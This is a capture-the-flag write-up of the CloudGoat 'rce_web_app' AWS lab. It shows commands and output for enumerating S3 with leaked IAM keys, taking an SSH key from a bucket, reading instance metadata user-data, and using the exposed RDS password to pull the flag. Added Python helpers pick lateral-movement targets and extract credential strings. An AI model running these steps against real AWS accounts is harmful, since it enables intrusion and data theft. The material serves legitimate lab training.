CloudGoatChallenges - RCE Web App
Rhino Security Labs released CloudGoat 2, their “Vulnerable by Design” AWS deployment tool, together with new attack scenarios to learn from and practise on. They then announced the #CloudGoatChallenges on Twitter, with a copy of "Hands-On AWS Penetration Testing with Kali Linux" and some Rhino swag for the winners.
Below is my approach to solving the rce_web_app challenge.
## We git clone the brand new CloudGoat 2 from GitHub.
https://github.com/RhinoSecurityLabs/cloudgoat
## Then we whitelist our public IP address (the scenario's security groups only admit whitelisted addresses) and create the rce_web_app scenario in our AWS account.
python3 cloudgoat.py config whitelist
python3 cloudgoat.py create rce_web_app --profile cloudgoat
## If all goes well, the scenario hands us the keys below as its starting point for the attack (two IAM users: Lara and McDuck).
cloudgoat_output_aws_account_id = 680000000314
cloudgoat_output_lara_access_key_id = AKIA2BJCOSNNDASHCH73
cloudgoat_output_lara_secret_key = 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
cloudgoat_output_mcduck_access_key_id = AKIA2BJCOSNNC65DAET3
cloudgoat_output_mcduck_secret_key = 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
## Then we configure a McDuck profile for the AWS CLI with the keys obtained above.
root@kali:~/Desktop/cloudgoat# aws configure --profile McDuck
AWS Access Key ID [****************SNME]: AKIA2BJCOSNNC65DAET3
AWS Secret Access Key [****************xvWU]: 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
Default region name [us-east-1]:
Default output format [json]:
## Then we list the S3 buckets in the account as the McDuck user. Note that this only needs s3:ListAllMyBuckets; seeing a bucket name does not mean we can read its contents, which we check next.
root@kali:~/Desktop/cloudgoat# aws s3 ls --profile McDuck
2019-06-26 02:04:07 cg-keystore-s3-bucket-cgidns0w17zkhn
2019-06-26 02:04:07 cg-logs-s3-bucket-cgidns0w17zkhn
2019-06-26 02:04:09 cg-secret-s3-bucket-cgidns0w17zkhn
## Let's dig into each bucket. Only the keystore bucket lets McDuck list objects, and it holds an SSH key pair.
root@kali:~/Desktop/cloudgoat# aws s3 ls s3://cg-logs-s3-bucket-cgidns0w17zkhn --recursive --profile McDuck
An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
root@kali:~/Desktop/cloudgoat# aws s3 ls s3://cg-secret-s3-bucket-cgidns0w17zkhn --recursive --profile McDuck
An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied
root@kali:~/Desktop/cloudgoat# aws s3 ls s3://cg-keystore-s3-bucket-cgidns0w17zkhn --recursive --profile McDuck
2019-06-26 02:04:23 3243 cloudgoat
2019-06-26 02:04:22 735 cloudgoat.pub
## Then we download both halves of the key pair from the accessible bucket.
root@kali:~/Desktop/cloudgoat# aws s3 cp s3://cg-keystore-s3-bucket-cgidns0w17zkhn/cloudgoat . --profile McDuck
download: s3://cg-keystore-s3-bucket-cgidns0w17zkhn/cloudgoat to ./cloudgoat
root@kali:~/Desktop/cloudgoat# aws s3 cp s3://cg-keystore-s3-bucket-cgidns0w17zkhn/cloudgoat.pub . --profile McDuck
download: s3://cg-keystore-s3-bucket-cgidns0w17zkhn/cloudgoat.pub to ./cloudgoat.pub
## Let's see what EC2 instances our user can describe. The fields that matter below are PublicDnsName, KeyName (which key pair the instance was launched with), the security groups (one named for SSH, one for HTTP) and IamInstanceProfile.
root@kali:~/Desktop/cloudgoat# aws ec2 describe-instances --profile McDuck
{
    "Reservations": [
        {
            "Instances": [
                {
                    "Monitoring": {
                        "State": "disabled"
                    },
                    "PublicDnsName": "ec2-3-78-97-133.compute-1.amazonaws.com",
                    "State": {
                        "Code": 16,
                        "Name": "running"
                    },
                    "EbsOptimized": false,
                    "LaunchTime": "2019-06-26T06:07:53.000Z",
                    "PublicIpAddress": "3.87.79.133",
                    "PrivateIpAddress": "10.0.10.194",
                    "ProductCodes": [],
                    "VpcId": "vpc-0a5f8e5b3bf5f037e",
                    "CpuOptions": {
                        "CoreCount": 1,
                        "ThreadsPerCore": 1
                    },
                    "StateTransitionReason": "",
                    "InstanceId": "i-05cc83b7828ed5966",
                    "EnaSupport": true,
                    "ImageId": "ami-0a313d6098716f372",
                    "PrivateDnsName": "ip-10-0-10-194.ec2.internal",
                    "KeyName": "cg-ec2-key-pair-cgidns0w17zkhn",
                    "SecurityGroups": [
                        {
                            "GroupName": "cg-ec2-ssh-cgidns0w17zkhn",
                            "GroupId": "sg-0d322da579bdf4df7"
                        },
                        {
                            "GroupName": "cg-ec2-http-cgidns0w17zkhn",
                            "GroupId": "sg-0ee3c46e0512c5a85"
                        }
                    ],
                    "ClientToken": "",
                    "SubnetId": "subnet-023cbc7682bbe438d",
                    "InstanceType": "t2.micro",
                    "CapacityReservationSpecification": {
                        "CapacityReservationPreference": "open"
                    },
                    "NetworkInterfaces": [
                        {
                            "Status": "in-use",
                            "MacAddress": "0a:aa:9c:ff:d1:7c",
                            "SourceDestCheck": true,
                            "VpcId": "vpc-0a5f8e5b3bf5f037e",
                            "Description": "",
                            "NetworkInterfaceId": "eni-0b91d3e5840d4ae98",
                            "PrivateIpAddresses": [
                                {
                                    "PrivateDnsName": "ip-10-0-10-194.ec2.internal",
                                    "PrivateIpAddress": "10.0.10.194",
                                    "Primary": true,
                                    "Association": {
                                        "PublicIp": "3.87.79.133",
                                        "PublicDnsName": "ec2-3-78-97-133.compute-1.amazonaws.com",
                                        "IpOwnerId": "amazon"
                                    }
                                }
                            ],
                            "PrivateDnsName": "ip-10-0-10-194.ec2.internal",
                            "Attachment": {
                                "Status": "attached",
                                "DeviceIndex": 0,
                                "DeleteOnTermination": true,
                                "AttachmentId": "eni-attach-038e6c2e4b46cff6e",
                                "AttachTime": "2019-06-26T06:07:53.000Z"
                            },
                            "Groups": [
                                {
                                    "GroupName": "cg-ec2-ssh-cgidns0w17zkhn",
                                    "GroupId": "sg-0d322da579bdf4df7"
                                },
                                {
                                    "GroupName": "cg-ec2-http-cgidns0w17zkhn",
                                    "GroupId": "sg-0ee3c46e0512c5a85"
                                }
                            ],
                            "Ipv6Addresses": [],
                            "OwnerId": "680000000314",
                            "PrivateIpAddress": "10.0.10.194",
                            "SubnetId": "subnet-023cbc7682bbe438d",
                            "Association": {
                                "PublicIp": "3.87.79.133",
                                "PublicDnsName": "ec2-3-78-97-133.compute-1.amazonaws.com",
                                "IpOwnerId": "amazon"
                            }
                        }
                    ],
                    "SourceDestCheck": true,
                    "Placement": {
                        "Tenancy": "default",
                        "GroupName": "",
                        "AvailabilityZone": "us-east-1a"
                    },
                    "Hypervisor": "xen",
                    "BlockDeviceMappings": [
                        {
                            "DeviceName": "/dev/sda1",
                            "Ebs": {
                                "Status": "attached",
                                "DeleteOnTermination": true,
                                "VolumeId": "vol-0004c7cc152ba6879",
                                "AttachTime": "2019-06-26T06:07:54.000Z"
                            }
                        }
                    ],
                    "Architecture": "x86_64",
                    "RootDeviceType": "ebs",
                    "IamInstanceProfile": {
                        "Id": "AIPA2BJCOSNNHWT76ND4T",
                        "Arn": "arn:aws:iam::680000000314:instance-profile/cg-ec2-instance-profile-cgidns0w17zkhn"
                    },
                    "RootDeviceName": "/dev/sda1",
                    "VirtualizationType": "hvm",
                    "Tags": [
                        {
                            "Value": "cg-ubuntu-ec2-cgidns0w17zkhn",
                            "Key": "Name"
                        }
                    ],
                    "HibernationOptions": {
                        "Configured": false
                    },
                    "AmiLaunchIndex": 0
                }
            ],
            "ReservationId": "r-0a2cbcbbf6e82f52f",
            "Groups": [],
            "OwnerId": "680000000314"
        }
    ]
}
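The describe-instances dump above is long, and in a real account there are usually many reservations. What a practitioner actually wants from it is a short list per instance: is it running with a public address, which key pair launched it (so we know whether a key we pulled from S3 might fit), and does it carry an instance profile (so a foothold on it could yield IMDS credentials). The Python below is an added example and is not code from the original post or from CloudGoat; it embeds a trimmed copy of the page's own output as constructed sample input, plus a hypothetical stopped instance (`i-0abc1234567890def`, an assumption) to show the filtering, and the `ssh`-in-group-name check is a naming heuristic, not a real inspection of the group's port 22 rule.

```python
import json

# Constructed sample input: the describe-instances output shown above, trimmed to the
# fields this triage reads so the example runs offline. The second instance is a
# hypothetical stopped one (an assumption) added only to exercise the filtering.
DESCRIBE_INSTANCES = json.loads("""
{
  "Reservations": [
    {
      "OwnerId": "680000000314",
      "Instances": [
        {
          "InstanceId": "i-05cc83b7828ed5966",
          "State": {"Code": 16, "Name": "running"},
          "PublicDnsName": "ec2-3-78-97-133.compute-1.amazonaws.com",
          "PublicIpAddress": "3.87.79.133",
          "PrivateIpAddress": "10.0.10.194",
          "KeyName": "cg-ec2-key-pair-cgidns0w17zkhn",
          "SecurityGroups": [
            {"GroupName": "cg-ec2-ssh-cgidns0w17zkhn", "GroupId": "sg-0d322da579bdf4df7"},
            {"GroupName": "cg-ec2-http-cgidns0w17zkhn", "GroupId": "sg-0ee3c46e0512c5a85"}
          ],
          "IamInstanceProfile": {
            "Id": "AIPA2BJCOSNNHWT76ND4T",
            "Arn": "arn:aws:iam::680000000314:instance-profile/cg-ec2-instance-profile-cgidns0w17zkhn"
          },
          "Tags": [{"Key": "Name", "Value": "cg-ubuntu-ec2-cgidns0w17zkhn"}]
        },
        {
          "InstanceId": "i-0abc1234567890def",
          "State": {"Code": 80, "Name": "stopped"},
          "PublicDnsName": "",
          "PrivateIpAddress": "10.0.10.55",
          "KeyName": "cg-ec2-key-pair-cgidns0w17zkhn",
          "SecurityGroups": [],
          "Tags": []
        }
      ]
    }
  ]
}
""")


def triage_instances(data, key_pairs_in_hand=()):
    """Summarise each instance by what matters for lateral movement.

    key_pairs_in_hand: EC2 KeyName values whose private key we already hold.
    A bucket listing alone does not say which pair a file like 'cloudgoat'
    belongs to, so the caller passes the names it has confirmed or wants to try.
    """
    summaries = []
    for reservation in data.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            tags = {t["Key"]: t["Value"] for t in inst.get("Tags", [])}
            state = inst.get("State", {}).get("Name")
            public_ip = inst.get("PublicIpAddress")
            sgs = [sg["GroupName"] for sg in inst.get("SecurityGroups", [])]
            profile = (inst.get("IamInstanceProfile") or {}).get("Arn")
            notes = []
            if state == "running" and public_ip:
                notes.append("public")            # reachable from outside the VPC
            if any("ssh" in name.lower() for name in sgs):
                notes.append("ssh-sg")            # name heuristic only; verify the port 22 rule
            if profile:
                notes.append("instance-profile")  # IMDS on this box hands out role credentials
            if inst.get("KeyName") in key_pairs_in_hand:
                notes.append("have-key")
            summaries.append({
                "instance_id": inst["InstanceId"],
                "name": tags.get("Name"),
                "state": state,
                "public_dns": inst.get("PublicDnsName") or None,
                "public_ip": public_ip,
                "private_ip": inst.get("PrivateIpAddress"),
                "key_name": inst.get("KeyName"),
                "security_groups": sgs,
                "instance_profile": profile,
                "notes": notes,
            })
    return summaries


def ssh_targets(summaries, key_path, user="ubuntu"):
    """Build an ssh command for every running instance that has a public address."""
    return [
        f"ssh -i {key_path} {user}@{s['public_dns'] or s['public_ip']}"
        for s in summaries if "public" in s["notes"]
    ]


if __name__ == "__main__":
    found = triage_instances(DESCRIBE_INSTANCES, key_pairs_in_hand={"cg-ec2-key-pair-cgidns0w17zkhn"})
    for s in found:
        print(s["instance_id"], s["state"], s["public_dns"], s["key_name"], s["notes"])
    for cmd in ssh_targets(found, "./cloudgoat"):
        print(cmd)
```

Feed it the real output with `aws ec2 describe-instances --profile McDuck > instances.json` and `json.load(open("instances.json"))` in place of the embedded sample; the login user (`ubuntu` here, because the AMI is Ubuntu) depends on the image, so treat it as a parameter rather than a constant.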
## Restrict the permissions on the private key, otherwise ssh refuses to use it.
root@kali:~/Desktop/cloudgoat# chmod 400 cloudgoat
## Connect to the EC2 instance with the downloaded key. The instance was launched with KeyName cg-ec2-key-pair-cgidns0w17zkhn, and the key from the keystore bucket is accepted for the ubuntu user.
root@kali:~/Desktop/cloudgoat# ssh -i cloudgoat ubuntu@ec2-3-78-97-133.compute-1.amazonaws.com
The authenticity of host 'ec2-3-78-97-133.compute-1.amazonaws.com (3.87.79.133)' can't be established.
ECDSA key fingerprint is SHA256:A653IVLxTmfpSPEPAWZfCe0bWRjZ6AxE/F6AhNh+IY0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'ec2-3-78-97-133.compute-1.amazonaws.com,3.87.79.133' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-1032-aws x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Wed Jun 26 06:18:36 UTC 2019
  System load:  0.0               Processes:           96
  Usage of /:   17.8% of 7.69GB   Users logged in:     0
  Memory usage: 18%               IP address for eth0: 10.0.10.194
  Swap usage:   0%
 * Get cloud support with Ubuntu Advantage Cloud Guest:
   http://www.ubuntu.com/business/services/cloud
149 packages can be updated.
71 updates are security updates.
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
# Check the instance metadata service (IMDS) for user-data. User-data is the bootstrap script the instance was launched with; it is stored in plaintext and any process on the box can read it from 169.254.169.254.
ubuntu@ip-10-0-10-194:~$ curl http://169.254.169.254/latest/user-data
#!/bin/bash
apt-get update
curl -sL https://deb.nodesource.com/setup_8.x | sudo -E bash -
apt-get install -y nodejs postgresql-client unzip
psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgidns0w17zkhn.cj4a8tpngrwk.us-east-1.rds.amazonaws.com:5432/cloudgoat \
-c "CREATE TABLE sensitive_information (name VARCHAR(50) NOT NULL, value VARCHAR(50) NOT NULL);"
psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgidns0w17zkhn.cj4a8tpngrwk.us-east-1.rds.amazonaws.com:5432/cloudgoat \
-c "INSERT INTO sensitive_information (name,value) VALUES ('Super-secret-passcode',E'V\!C70RY-4hy2809gnbv40h8g4b');"
sleep 15s
cd /home/ubuntu
unzip app.zip -d ./app
cd app
node index.js &
echo -e "\n* * * * * root node /home/ubuntu/app/index.js &\n* * * * * root sleep 10; curl GET http://cg-lb-cgidns0w17zkhn-544788922.us-east-1.elb.amazonaws.com/mkja1xijqf0abo1h9glg.html &\n* * * * * root sleep 10; node /home/ubuntu/app/index.js &\n* * * * * root sleep 20; node /home/ubuntu/app/index.js &\n* * * * * root sleep 30; node /home/ubuntu/app/index.js &\n* * * * * root sleep 40; node /home/ubuntu/app/index.js &\n* * * * * root sleep 50; node /home/ubuntu/app/index.js &\n" >> /etc/crontab
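Reading the user-data by eye works for one short script, but the same pattern (a connection string with the password inline, plus internal hostnames the box talks to) is what you would grep for across every instance in an engagement, and it is also what a defender should scan launch templates for before deploy. The Python below is an added example, not code from the original post or from CloudGoat: it pulls every credential-bearing URI and every referenced hostname out of user-data and tags the hosts by AWS service. The embedded `USER_DATA` is a constructed sample made from the relevant lines of the script above (the long crontab `echo` is cut down to the one entry that carries a URL); the regexes are the example's own and match `scheme://user:password@host` regardless of the database type.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the relevant lines of the user-data script recovered above, with the
# long crontab echo cut to the one entry that carries a URL. Values are the page's own.
USER_DATA = r"""#!/bin/bash
apt-get update
curl -sL https://deb.nodesource.com/setup_8.x | sudo -E bash -
apt-get install -y nodejs postgresql-client unzip
psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgidns0w17zkhn.cj4a8tpngrwk.us-east-1.rds.amazonaws.com:5432/cloudgoat \
  -c "CREATE TABLE sensitive_information (name VARCHAR(50) NOT NULL, value VARCHAR(50) NOT NULL);"
psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgidns0w17zkhn.cj4a8tpngrwk.us-east-1.rds.amazonaws.com:5432/cloudgoat \
  -c "INSERT INTO sensitive_information (name,value) VALUES ('Super-secret-passcode',E'V\!C70RY-4hy2809gnbv40h8g4b');"
echo -e "* * * * * root sleep 10; curl GET http://cg-lb-cgidns0w17zkhn-544788922.us-east-1.elb.amazonaws.com/mkja1xijqf0abo1h9glg.html &" >> /etc/crontab
"""

# scheme://user:password@host[:port][/path] -- any URI that carries a password inline
# (postgresql://, mysql://, mongodb://, redis://, amqp://, https:// with basic auth, ...)
CONN_RE = re.compile(r"\b([a-z][a-z0-9+.-]*)://([^\s:/@\"']+):([^\s@\"']+)@([^\s\"'\\]+)")
# plain http(s) URLs: hosts the instance talks to even without credentials
URL_RE = re.compile(r"\bhttps?://[^\s\"'\\]+")


def extract_connection_strings(text):
    """Return one dict per distinct credential-bearing URI found in text."""
    found, seen = [], set()
    for m in CONN_RE.finditer(text):
        scheme, user, password, rest = m.groups()
        hostport, _, path = rest.partition("/")      # host:port / database
        host, _, port = hostport.partition(":")
        key = (scheme, user, host, port, path)
        if key in seen:                               # the same URI repeated on two psql lines
            continue
        seen.add(key)
        found.append({"scheme": scheme, "user": user, "password": password,
                      "host": host, "port": port or None, "database": path or None})
    return found


def classify_host(host):
    """Rough placement of a hostname by its AWS service suffix."""
    h = host.lower()
    if h.endswith(".rds.amazonaws.com"):
        return "rds"
    if h.endswith(".elb.amazonaws.com"):
        return "elb"
    if h.endswith(".amazonaws.com"):
        return "aws"
    return "external"


def extract_hosts(text):
    """Map every hostname referenced in text (with or without credentials) to its class."""
    hosts = {}
    for entry in extract_connection_strings(text):
        hosts[entry["host"]] = classify_host(entry["host"])
    for url in URL_RE.findall(text):
        host = urlsplit(url).hostname
        if host:
            hosts[host] = classify_host(host)
    return hosts


if __name__ == "__main__":
    for cred in extract_connection_strings(USER_DATA):
        print(f"{cred['scheme']} {cred['user']}:{cred['password']} -> "
              f"{cred['host']}:{cred['port']}/{cred['database']}")
    for host, kind in extract_hosts(USER_DATA).items():
        print(f"{kind:9} {host}")
```

On the instance itself the input would be `curl -s http://169.254.169.254/latest/user-data`; from the attacker side with EC2 read access the same script is available without a shell via `aws ec2 describe-instance-attribute --attribute userData --instance-id ...` (base64-encoded), which is exactly why secrets do not belong in user-data.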
# The user-data above contains the credentials for the PostgreSQL RDS instance, so we connect with the same connection string from the box (the RDS instance is reachable from inside the VPC).
ubuntu@ip-10-0-10-194:~$ psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-cgidns0w17zkhn.cj4a8tpngrwk.us-east-1.rds.amazonaws.com:5432/cloudgoat
psql (10.9 (Ubuntu 10.9-0ubuntu0.18.04.1), server 9.6.11)
SSL connection (protocol: TLSv1.2, cipher: ECDHE-RSA-AES256-GCM-SHA384, bits: 256, compression: off)
Type "help" for help.
cloudgoat=> \dt
                  List of relations
 Schema |         Name          | Type  |  Owner
--------+-----------------------+-------+---------
 public | sensitive_information | table | cgadmin
(1 row)
cloudgoat=> select * from sensitive_information;
         name          |           value
-----------------------+----------------------------
 Super-secret-passcode | V!C70RY-4hy2809gnbv40h8g4b
(1 row)
cloudgoat=>
# We have the flag for the challenge: V!C70RY-4hy2809gnbv40h8g4b
# Then we destroy the deployed rce_web_app scenario with the command below, so the vulnerable resources (and the leaked keys) do not stay live in the account.
python3 cloudgoat.py destroy all --profile cloudgoat
# Wait for this output to appear on your screen
Destroy complete! Resources: 45 destroyed.
[cloudgoat] terraform destroy completed with no error code.
Successfully destroyed rce_web_app.
Scenario instance files have been moved to /root/Desktop/cloudgoat/trash/rce_web_app_cgidns0w17zkhn
Destruction complete.
1 scenarios successfully destroyed
0 destroys failed
0 skipped
Happy Hacking !!